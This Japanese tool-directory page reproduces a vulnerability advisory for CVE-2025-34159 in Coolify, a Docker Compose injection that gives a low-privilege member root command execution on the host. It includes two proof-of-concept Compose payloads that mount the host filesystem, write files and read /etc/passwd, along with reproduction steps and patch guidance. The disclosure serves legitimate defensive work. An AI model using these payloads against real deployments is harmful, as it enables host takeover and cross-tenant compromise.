Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-34159 — Coolifyのアプリケーション展開ワークフローに重大なリモートコード実行(RCE)脆弱性が存在します。この欠陥により、低権限のメンバーがプロジェクト作成または更新中に任意のDocker Composeディレクティブを注入できます。ホストファイルシステムをマウントする悪意のあるサービスを定義することで、攻撃者はルートレベルのコマンド実行を達成できます。 | Kitploit
ツール/GitHubGitHub/eyodav/cve-2025-34159
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストクラウドセキュリティ設定ミスレッドチーミング
GitHubeyodav/cve-2025-34159

CVE-2025-34159

Coolifyのアプリケーション展開ワークフローに重大なリモートコード実行(RCE)脆弱性が存在します。この欠陥により、低権限のメンバーがプロジェクト作成または更新中に任意のDocker Composeディレクティブを注入できます。ホストファイルシステムをマウントする悪意のあるサービスを定義することで、攻撃者はルートレベルのコマンド実行を達成できます。

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-34159: Coolify における Docker Compose インジェクション

脆弱性の概要

フィールド値
CVE IDCVE-2025-34159
影響を受けるバージョンCoolify ≤ v4.0.0-beta.420.6
修正バージョンv4.0.0-beta.420.7
深刻度重大
CVSS 4.0CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-78 (OSコマンドインジェクション), CWE-20 (不適切な入力検証)

概要

Coolify のアプリケーションデプロイワークフローには、重大なリモートコード実行 (RCE) の脆弱性が存在します。この欠陥により、低権限のメンバーがプロジェクトの作成または更新時に任意のDocker Compose ディレクティブを注入できます。ホストファイルシステムをマウントする悪意のあるサービスを定義することで、攻撃者はコンテナの隔離を完全にバイパスして、ホスト OS 上で root レベルのコマンド実行を達成できます。


セキュリティへの影響

  • root 権限によるホストシステム上での任意のコマンド実行
  • システムファイルの読み書き、永続化、横展開を含むホストの完全な侵害
  • 同じインスタンス上の他のユーザーやチームを侵害する可能性のあるマルチテナントセキュリティ侵害
  • UI ターミナルアクセス制限 (403 コントロール) を無意味にするセキュリティコントロールのバイパス

技術的詳細

影響を受けるバージョン

  • 影響を受けるバージョン: Coolify ≤ v4.0.0-beta.420.6
  • 修正済みバージョン: v4.0.0-beta.420.7

攻撃ベクター

この脆弱性は、ユーザーが提供した Docker Compose 構成が十分な検証やサンドボックス化なしに処理されるプロジェクトデプロイワークフローに存在します。


概念実証 (PoC)

PoC 1: ホストルートマウントとコマンド実行

version: '3.8'
services:
  poc-host-root:
    image: alpine:3.19
    tty: true
    volumes:
      - /:/host:rw
    command: >
      sh -c "
        echo '[*] Proof of RCE on host' &&
        echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
        whoami &&
        id &&
        uname -a &&
        head -n 5 /host/etc/passwd
      "

結果: デプロイ後、/tmp/proof_rce.txt がホストシステム上に作成され、root 権限による RCE が確認されます。

PoC 2: 特定ホストパスへの書き込み

version: '3.8'
services:
  poc-host-write:
    image: alpine:3.19
    tty: true
    volumes:
      - /home/eyodav/PoC:/host
    command: >
      sh -c "
        set -e;
        mkdir -p /host &&
        echo '[*] Writing PoC file to host mount...' &&
        echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
        cd /host &&
        pwd &&
        ls -la
      "

再現手順

  1. メンバーレベルのユーザー(非管理者)として認証する
  2. Coolify でプロジェクトを作成または編集する
  3. 上記の Docker Compose ペイロードのいずれかを使用して悪意のある構成を提供する
  4. プロジェクトをデプロイする
  5. ホスト側のアーティファクト(例: /tmp/proof_rce.txt)を確認するか、デプロイログのコマンド出力をレビューして悪用を検証する

緊急対応

  1. Coolify v4.0.0-beta.420.7 以降に直ちにアップグレードする
  2. 潜在的に悪意のある Docker Compose 構成がないか既存のプロジェクトをレビューする

参考情報

  • パッチ/リリースノート: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.420.7
  • アドバイザリ/PoC リポジトリ: https://github.com/Eyodav/CVE-2025-34159
ツールをダウンロード